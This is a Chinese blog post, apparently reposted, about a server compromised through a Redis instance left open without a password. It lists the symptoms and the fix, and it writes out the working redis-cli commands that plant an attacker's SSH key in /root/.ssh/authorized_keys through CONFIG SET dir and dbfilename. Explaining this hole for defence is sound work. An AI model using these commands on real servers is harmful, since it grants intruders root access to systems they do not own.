Redis没有加密漏洞导致服务器被入侵以及解决的过程

 

 

被入侵现象

服务器多了很多莫名其妙的操作，根据查看操作记录命令history得到。

服务器会莫名其妙重启。

经常ssh免密登录失效。

apt-get使用报错。

报错log如下：

insserv: warning: script 'S01wipefs' missing LSB tags and overrides
insserv: warning: script 'S02acpidtd' missing LSB tags and overrides
insserv: warning: script 'S99selinux' missing LSB tags and overrides
insserv: warning: script 'S02DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'wipefs' missing LSB tags and overrides
insserv: warning: script 'DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'selinux' missing LSB tags and overrides
insserv: warning: script 'acpidtd' missing LSB tags and overrides
insserv: There is a loop between service plymouth and mountdevsubfs if started
insserv:  loop involving service mountdevsubfs at depth 2
insserv:  loop involving service udev at depth 1
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!

看起来很正常对不对，毕竟selinux也是常用安全服务。

被入侵原因：Redis漏洞

由于Redis可以直接直接通过IP:port 访问，所以如果不配置密码，会端口大开。在通过redis-cli修改数据持久化路径指定到.ssh/authorized_keys，将自己的ssh公钥持久化到服务器公钥，就可以直接ssh登录服务器进行操作。在https://bbs.ichunqiu.com/thread-17634-1-1.html 一文中有详细说明。大致攻击过程记录如下：

将公钥写入一个文本中：

cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> hack.txt

利用redis客户端连接靶机redis：

cat hack.txt | /usr/local/redis-2.8.3/src/./redis-cli -h 192.168.132.134 -x set crack

获取并修改redis备份的路径

CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys

保存

save

至此可以直接ssh免密登录。

补漏洞

其实很简单，在redis的配置文件里加上密码验证即可。这样在redis-cli里不用密码是没有办法进行操作的。

或者可以在配置文件里bind固定地址才可以访问Redis。

 

转载自https://www.jianshu.com/p/b019eb9e32a4，感谢作者